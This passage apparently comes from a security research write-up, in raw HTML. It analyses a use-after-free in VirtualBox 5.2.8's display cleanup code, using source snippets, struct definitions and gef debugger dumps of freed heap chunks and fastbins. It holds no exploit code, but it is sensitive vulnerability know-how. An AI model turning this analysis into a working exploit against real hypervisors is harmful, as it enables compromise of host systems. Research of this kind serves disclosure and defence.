data-line=\"crayon-5b7b3e582f4ee095432337-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ee095432337-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ee095432337-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ee095432337-9\">9<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ee095432337-1\"><span class=\"crayon-e\">DECLCALLBACK<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">bool<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CrFbDisplayBase<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">entriesDestroyCb<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">HCR_FRAMEBUFFER <\/span><span 
class=\"crayon-v\">hFb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HCR_FRAMEBUFFER_ENTRY <\/span><span class=\"crayon-v\">hEntry<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">pvContext<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ee095432337-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ee095432337-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">ICrFbDisplay*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pvContext<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">EntryDestroyed<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">hFb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hEntry<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ee095432337-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">RT_SUCCESS<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">rc<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ee095432337-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ee095432337-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">WARN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;err&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ee095432337-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ee095432337-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ee095432337-9\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0019 seconds] -->  <\/p>\n<p>Not diving deeper, EntryDestroyed() is actually CrFbDisplayVrdp::EntryRemoved() which removes a display and frees its memory. Now you can see what&#8217;s wrong: in just one iteration of the loop of fbCleanupRemoveAllEntries() all displays are deleted and freed, and the second iteration will use already freed memory.<\/p>\n<p><b>Controlled Memory Analysis<\/b><br \/> Each display (HCR_FRAMEBUFFER_ENTRY) has a hash table where a value is a pointer to a structure describing coordinates of the display. 
For each display there is usually only one entry in the hash.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f4f4904520448\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> typedef struct CR_FRAMEBUFFER_ENTRY  {      
VBOXVR_SCR_COMPOSITOR_ENTRY Entry;      RTLISTNODE Node;      uint32_t cRefs;      CR_FBENTRY_FLAGS Flags;      CRHTABLE HTable;  } CR_FRAMEBUFFER_ENTRY;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4f4904520448-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4f4904520448-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4f4904520448-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4f4904520448-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4f4904520448-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4f4904520448-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4f4904520448-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4f4904520448-8\">8<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4f4904520448-1\"><span class=\"crayon-r\">typedef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5b7b3e582f4f4904520448-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4f4904520448-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">VBOXVR_SCR_COMPOSITOR_ENTRY <\/span><span class=\"crayon-v\">Entry<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4f4904520448-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">RTLISTNODE <\/span><span class=\"crayon-v\">Node<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4f4904520448-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">uint32_t <\/span><span class=\"crayon-v\">cRefs<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4f4904520448-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">CR_FBENTRY_FLAGS <\/span><span class=\"crayon-v\">Flags<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4f4904520448-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">CRHTABLE <\/span><span class=\"crayon-v\">HTable<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4f4904520448-8\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR_FRAMEBUFFER_ENTRY<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>The structure is H3DORInstance, defined in ConsoleVRDPServer.cpp, the file mentioned at the beginning of the analysis.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f4f7194773685\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" 
title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">typedef struct H3DORInstance\n{\n    ConsoleVRDPServer *pThis;\n    HVRDEIMAGE hImageBitmap;\n    int32_t x;\n    int32_t y;\n    uint32_t w;\n    uint32_t h;\n    bool fCreated;\n    bool fFallback;\n    bool fTopDown;\n} H3DORInstance;<\/textarea><\/div>\n<\/p><\/div>\n<p>This is a &#8220;glue&#8221; between the high level of VRDP Server and the rest of VirtualBox. 
While the hash table holds only void pointers, they are cast to H3DORInstance when they are passed to the ConsoleVRDPServer::* methods.<\/p>\n<p>Back to the assembly: let&#8217;s look at what memory is referenced in the method ConsoleVRDPServer::H3DORVisibleRegion when it&#8217;s called under normal conditions.<\/p>\n<\/p>\n<div id=\"crayon-5b7b3e582f4fc579128644\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<\/p>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" 
class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">gef\u27a4  x\/5i $pc\n=&gt; 0x7fa018ec9dff:\tmov    rax,QWORD PTR [rax]\n   0x7fa018ec9e02:\tmov    rdi,QWORD PTR [rdi+0x8]\n   0x7fa018ec9e06:\tcall   QWORD PTR [rax+0x320]\n   0x7fa018ec9e0c:\tleave\n   0x7fa018ec9e0d:\tret\ngef\u27a4  x\/8gx $rax-0x10\n0x7fa005b8e280:\t0x0000000000000000\t0x0000000000000035\n0x7fa005b8e290:\t0x00007fa010008070\t0x00007fa005bf97f0\n0x7fa005b8e2a0:\t0x0000000000000000\t0x0000029800000400\n0x7fa005b8e2b0:\t0x0000000000010101\t0x0000000000000065\ngef\u27a4  <\/textarea><\/div>\n<\/p><\/div>\n<p>$rax-0x10 is a malloc_chunk of size 0x30 and $rax points to an H3DORInstance. You can see that the &#8220;w&#8221; (width) field is 0x400 and &#8220;h&#8221; (height) is 0x298 &#8211; it&#8217;s the resolution of our RDP client display. 
Let&#8217;s break here when the RDP session is being closed.<\/p>\n<\/p>\n<div id=\"crayon-5b7b3e582f501513155149\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<\/p>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">gef\u27a4  x\/5i $pc\n=&gt; 0x7feffac2cdff:\tmov    rax,QWORD PTR [rax]\n   0x7feffac2ce02:\tmov    rdi,QWORD PTR [rdi+0x8]\n   0x7feffac2ce06:\tcall   QWORD PTR [rax+0x320]\n   0x7feffac2ce0c:\tleave\n   0x7feffac2ce0d:\tret\ngef\u27a4  x\/8gx $rax-0x10\n0x7fefed472ba0:\t0x0000000000000000\t0x0000000000000035\n0x7fefed472bb0:\t0x00007fefed44c040\t0x00007fefed44e630\n0x7fefed472bc0:\t0x0000000000000000\t0x0000029800000400\n0x7fefed472bd0:\t0x0000000000010101\t0x0000000000001015\ngef\u27a4  heap_for_ptr 0x7fefed472ba0\n$2 = 0x7fefec000000\ngef\u27a4  heap bins fast 0x7fefec000000\nFastbins[idx=0, size=0x10] 0x00\n...\nFastbins[idx=5, size=0x60]  \u2190  ...  \u2190  Chunk(addr=0x7fefed472bb0, size=0x34, flags=PREV_INUSE|NON_MAIN_ARENA) [incorrect fastbin_index]  \u2190  ...\n...<\/textarea><\/div>\n<\/p><\/div>\n<p>The memory being referenced is a freed chunk stored in the fastbins. The first two qwords at $rax were replaced with malloc_chunk* fd and malloc_chunk* bk, respectively. The code takes the first qword, dereferences it, and then dereferences the result again at offset 0x320. 
We need to switch to binaries we compiled ourselves, with symbols and optimization disabled, to show what the first qword really points to at this moment.<\/p>\n<p>The next snippet lists the displays and their corresponding H3DORInstance-s at the first iteration of the loop, when no displays have been freed yet.<\/p>\n<\/p>\n<div id=\"crayon-5b7b3e582f50b912176048\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<\/p>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" 
class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Thread 43 &#8220;VDMA&#8221; hit Breakpoint 4, CrFbDisplayBase::fbCleanupRemoveAllEntries (this=0x7fb79d69aec0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_base.cpp:320  320\t    while ((pEntry = CrVrScrCompositorConstIterNext(&amp;Iter)) != NULL)  gef\u27a4  pl  $1 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4e80  $2 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4d00  $3 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4dc0  $4 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4f40  $5 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4c40  $6 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4b80  $7 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4a00  $8 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4940  $9 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4ac0  gef\u27a4  pli  $10 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4e80  $11 = &#8220;H3DORInstance:&#8221;  0x7fb79d130260:\t0x00007fb79c0074b0\t0x00007fb79cc71ef0  0x7fb79d130270:\t0x0000000000000000\t0x0000029b00000556  0x7fb79d130280:\t0x0000000000010101  $12 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4d00  $13 = &#8220;H3DORInstance:&#8221;  0x7fb79cc729f0:\t0x00007fb79c0074b0\t0x00007fb79d06dd40  0x7fb79cc72a00:\t0x0000000000000000\t0x0000029b00000556  0x7fb79cc72a10:\t0x0000000000010101  $14 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4dc0  $15 = &#8220;H3DORInstance:&#8221;  0x7fb79cc81690:\t0x00007fb79c0074b0\t0x00007fb79e1d7c50  0x7fb79cc816a0:\t0x0000000000000000\t0x0000029b00000556  0x7fb79cc816b0:\t0x0000000000010101  $16 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4f40  $17 = &#8220;H3DORInstance:&#8221;  0x7fb79d66a310:\t0x00007fb79c0074b0\t0x00007fb79cc81390  0x7fb79d66a320:\t0x0000000000000000\t0x0000029b00000556  0x7fb79d66a330:\t0x0000000000010101  $18 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4c40  $19 = &#8220;H3DORInstance:&#8221;  
0x7fb79cc67450:\t0x00007fb79c0074b0\t0x00007fb79cc7ba00  0x7fb79cc67460:\t0x0000000000000000\t0x0000029b00000556  0x7fb79cc67470:\t0x0003506100010101  $20 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4b80  $21 = &#8220;H3DORInstance:&#8221;  0x7fb79d12dc50:\t0x00007fb79c0074b0\t0x00007fb79d12f080  0x7fb79d12dc60:\t0x0000000000000000\t0x0000029b00000556  0x7fb79d12dc70:\t0x0000000000010101  $22 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4a00  $23 = &#8220;H3DORInstance:&#8221;  0x7fb79d66a2b0:\t0x00007fb79c0074b0\t0x00007fb79d12f330  0x7fb79d66a2c0:\t0x0000000000000000\t0x0000029b00000556  0x7fb79d66a2d0:\t0x0003506f00010101  $24 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4940  $25 = &#8220;H3DORInstance:&#8221;  0x7fb79cf983c0:\t0x00007fb79c0074b0\t0x00007fb79cc81400  0x7fb79cf983d0:\t0x0000000000000000\t0x0000029b00000556  0x7fb79cf983e0:\t0x0000000000010101  $26 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4ac0  $27 = &#8220;H3DORInstance:&#8221;  0x7fb79d0a7430:\t0x00007fb79c0074b0\t0x00007fb79cc814f0  0x7fb79d0a7440:\t0x0000000000000000\t0x0000029b00000556  0x7fb79d0a7450:\t0x0000000000010101<\/textarea><\/div>\n<\/p><\/div>\n<p>They look fine: the first qword of every H3DORInstance still holds the same value, 0x00007fb79c0074b0, and the fields after it are intact. Now let&#8217;s step over one iteration of the loop, which frees all the displays, and dump the display structures again.<\/p>\n<div id=\"crayon-5b7b3e582f514775088597\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">gef\u27a4  c\nContinuing.\n[Thread 0x7fb791e05700 (LWP 3722) exited]\n[Thread 0x7fb793fff700 (LWP 3723) exited]\n\nThread 43 \"VDMA\" hit Breakpoint 4, CrFbDisplayBase::fbCleanupRemoveAllEntries (this=0x7fb79d69aec0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_base.cpp:320\n320\t    while ((pEntry = CrVrScrCompositorConstIterNext(&amp;Iter)) != NULL)\ngef\u27a4  pl\n$28 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4e80\n$29 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4d00\n$30 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4dc0\n$31 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4f40\n$32 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4c40\n$33 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4b80\n$34 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4a00\n$35 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4940\n$36 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4ac0\ngef\u27a4  pli\n$37 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4e80\n$38 = \"H3DORInstance:\"\n0x7fb79d130260:\t0x00007fb79cc81460\t0x00007fb79cc71ef0\n0x7fb79d130270:\t0x0000000000000000\t0x0000029b00000556\n0x7fb79d130280:\t0x0000000000010101\n$39 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4d00\n$40 = \"H3DORInstance:\"\n0x7fb79cc729f0:\t0x00007fb79d130250\t0x00007fb79d06dd40\n0x7fb79cc72a00:\t0x0000000000000000\t0x0000029b00000556\n0x7fb79cc72a10:\t0x0000000000010101\n$41 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4dc0\n$42 = \"H3DORInstance:\"\n0x7fb79cc81690:\t0x00007fb79cc729e0\t0x00007fb79e1d7c50\n0x7fb79cc816a0:\t0x0000000000000000\t0x0000029b00000556\n0x7fb79cc816b0:\t0x0000000000010101\n$43 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4f40\n$44 = \"H3DORInstance:\"\n0x7fb79d66a310:\t0x00007fb79cc81680\t0x00007fb79cc81390\n0x7fb79d66a320:\t0x0000000000000000\t0x0000029b00000556\n0x7fb79d66a330:\t0x0000000000010101\n$45 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4c40\n$46 = \"H3DORInstance:\"\n0x7fb79cc67450:\t0x0000000000000000\t0x00007fb79cc7ba00\n0x7fb79cc67460:\t0x0000000000000000\t0x0000029b00000556\n0x7fb79cc67470:\t0x0003506100010101\n$47 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4b80\n$48 = \"H3DORInstance:\"\n0x7fb79d12dc50:\t0x00007fb79d66a300\t0x00007fb79d12f080\n0x7fb79d12dc60:\t0x0000000000000000\t0x0000029b00000556\n0x7fb79d12dc70:\t0x0000000000010101\n$49 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4a00\n$50 = \"H3DORInstance:\"\n0x7fb79d66a2b0:\t0x00007fb79cc67440\t0x00007fb79d12f330\n0x7fb79d66a2c0:\t0x0000000000000000\t0x0000029b00000556\n0x7fb79d66a2d0:\t0x0003506f00010101\n$51 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4940\n$52 = \"H3DORInstance:\"\n0x7fb79cf983c0:\t0x00007fb79d12dc40\t0x00007fb79cc81400\n0x7fb79cf983d0:\t0x0000000000000000\t0x0000029b00000556\n0x7fb79cf983e0:\t0x0000000000010101\n$53 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4ac0\n$54 = \"H3DORInstance:\"\n0x7fb79d0a7430:\t0x00007fb79cf983b0\t0x00007fb79cc814f0\n0x7fb79d0a7440:\t0x0000000000000000\t0x0000029b00000556\n0x7fb79d0a7450:\t0x0000000000010101<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-1\"><span class=\"crayon-i\">gef<\/span>\u27a4<span
class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">c<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-2\"><span class=\"crayon-v\">Continuing<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-3\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-i\">Thread<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb791e05700<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">LWP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3722<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">exited<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-4\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-i\">Thread<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb793fff700<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">LWP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3723<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">exited<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f514775088597-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f514775088597-6\"><span class=\"crayon-i\">Thread<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">43<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;VDMA&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hit <\/span><span class=\"crayon-i\">Breakpoint<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span 
